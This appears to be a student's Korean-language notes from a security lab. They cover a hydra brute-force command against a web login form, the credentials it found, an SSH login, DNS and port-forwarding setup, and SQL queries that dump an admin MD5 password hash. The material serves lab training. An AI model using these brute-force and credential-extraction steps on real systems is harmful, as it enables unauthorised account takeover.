cd /home/kali
su
nano user.txt
nano passwd.txt
hydra -L user.txt -P passwd.txt victim.jeonjucom.kr http-post-form "/login_chk.php:id=^USER^&pw=^PASS^:fail" -V
=> (bee/1qaz2wsx)
ssh 192.168.0.126 (bee/1qaz2wsx)
Bootstrap Example
미션2: 윈도우10에서 3대 서버로 접속할 수 있도록 설정한 후 웹브라우저와 EDITPLUS로 접속하기
st.kr로 확인
editplus 로 사이트 접속
    intra.st.kr
    intra.st.kr
    st
    123456
    /home/st/public_html
nat설정 포트포워딩(21,22,143,110,25,80,53,3306)
    53번은 udp로 연결 !!
nano /etc/bind/st.kr.zone
    ip 변경
nano /etc/resolv.conf
    nameserver ip 변경(10.0.2.15) (***재부팅 후 항상 재확인)
nano /etc/hosts
    ip변경
systelctl restart
mysql
select * from user where user=? and password=?;
    error
select * from users where user='admin' and password='password';
    Empty set (0.00 sec)
select user,password from users;
    admin | 5f4dcc3b5aa765d61d8327deb882cf99
$password = md5($password);
    $query = "select * from users where user='admin' and password=$password";
실행시키면 페이지에 진짜 비밀번호가 뜬다!!